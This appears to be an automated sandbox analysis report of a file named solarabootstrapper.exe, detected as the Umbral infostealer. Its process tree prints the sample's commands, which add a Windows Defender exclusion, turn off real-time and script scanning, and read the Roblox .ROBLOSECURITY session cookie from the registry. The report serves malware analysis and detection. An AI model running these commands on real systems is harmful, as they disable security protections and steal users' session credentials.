Resubmissions

04-07-2024 13:03

240704-qaf1tsxckj 10

04-07-2024 12:47

240704-p1mqmaxbjr 10

Analysis

  • max time kernel
    146s
  • max time network
    118s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04-07-2024 12:47

General

  • Target

    SolaraB/Solara/solarabootstrapper.exe

  • Size

    227KB

  • MD5

    ebf1358b8496d5c895f4b8f9298f7f96

  • SHA1

    f0136d66bf877934376858064344c2038b998fd4

  • SHA256

    bccba62c31f689715d01f4e80edbe2fe6a816edb571c4a409fccbe2d5b789b65

  • SHA512

    ca82e5838c7e8b292f46e5b20684b7fbb861f449678fc6283bd5c587c0958c069800e94c9f65b239609434564a394f8ca168d83d40bc27c96ade6c18744beb6d

  • SSDEEP

    6144:eloZMLrIkd8g+EtXHkv/iD46E6TjpaC9sop7mGz3/b8e1mZJi:IoZ0L+EP86E6TjpaC9sop7mGzLt

Malware Config

Signatures

  • Detect Umbral payload 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SolaraB\Solara\solarabootstrapper.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaraB\Solara\solarabootstrapper.exe"
    1⤵
    • Drops file in Drivers directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1808
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" csproduct get uuid
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2272
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\SolaraB\Solara\solarabootstrapper.exe'
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3380
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2924
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:716
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1704
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" os get Caption
      2⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3520
    • C:\Windows\System32\Wbem\wmic.exe
      "wmic.exe" computersystem get totalphysicalmemory
      2⤵
        PID:3756
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        2⤵
          PID:4632
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          2⤵
            PID:5044
          • C:\Windows\System32\Wbem\wmic.exe
            "wmic" path win32_VideoController get name
            2⤵
            • Detects videocard installed
            PID:2964
        • C:\Windows\System32\rundll32.exe
          C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
          1⤵
            PID:2752

          Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

            Filesize

            2KB

            MD5

            d85ba6ff808d9e5444a4b369f5bc2730

            SHA1

            31aa9d96590fff6981b315e0b391b575e4c0804a

            SHA256

            84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

            SHA512

            8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            944B

            MD5

            6d3e9c29fe44e90aae6ed30ccf799ca8

            SHA1

            c7974ef72264bbdf13a2793ccf1aed11bc565dce

            SHA256

            2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

            SHA512

            60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            948B

            MD5

            5824a6037c081fda5d46de274b6e2799

            SHA1

            526367a09300cbde430e8fb44e41cbe7a0937aac

            SHA256

            4d610d9cd32a20279c7133a726ff61820d6930e5aa18253ee1422f3a6f54953f

            SHA512

            a109b150f730cda78d5bee106bd232f9dca7500dfb7899c6919de2bd542e345ca271aa11809a24ea0a27dca158067ab3a2d5688ac0a2325185143245f1665582

          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

            Filesize

            1KB

            MD5

            548dd08570d121a65e82abb7171cae1c

            SHA1

            1a1b5084b3a78f3acd0d811cc79dbcac121217ab

            SHA256

            cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc

            SHA512

            37b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b

          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_q3zgz02s.ssv.ps1

            Filesize

            60B

            MD5

            d17fe0a3f47be24a6453e9ef58c94641

            SHA1

            6ab83620379fc69f80c0242105ddffd7d98d5d9d

            SHA256

            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

            SHA512

            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

          • memory/1808-34-0x000001807ABF0000-0x000001807AC40000-memory.dmp

            Filesize

            320KB

          • memory/1808-1-0x00007FFDAABB3000-0x00007FFDAABB5000-memory.dmp

            Filesize

            8KB

          • memory/1808-82-0x00007FFDAABB0000-0x00007FFDAB671000-memory.dmp

            Filesize

            10.8MB

          • memory/1808-73-0x000001807ACF0000-0x000001807AD02000-memory.dmp

            Filesize

            72KB

          • memory/1808-72-0x000001807AC40000-0x000001807AC4A000-memory.dmp

            Filesize

            40KB

          • memory/1808-2-0x00007FFDAABB0000-0x00007FFDAB671000-memory.dmp

            Filesize

            10.8MB

          • memory/1808-33-0x000001807AC70000-0x000001807ACE6000-memory.dmp

            Filesize

            472KB

          • memory/1808-0-0x0000018060500000-0x0000018060540000-memory.dmp

            Filesize

            256KB

          • memory/1808-35-0x0000018062190000-0x00000180621AE000-memory.dmp

            Filesize

            120KB

          • memory/3380-10-0x000002BFA9840000-0x000002BFA9862000-memory.dmp

            Filesize

            136KB

          • memory/3380-14-0x00007FFDAABB0000-0x00007FFDAB671000-memory.dmp

            Filesize

            10.8MB

          • memory/3380-3-0x00007FFDAABB0000-0x00007FFDAB671000-memory.dmp

            Filesize

            10.8MB

          • memory/3380-18-0x00007FFDAABB0000-0x00007FFDAB671000-memory.dmp

            Filesize

            10.8MB

          • memory/3380-15-0x00007FFDAABB0000-0x00007FFDAB671000-memory.dmp

            Filesize

            10.8MB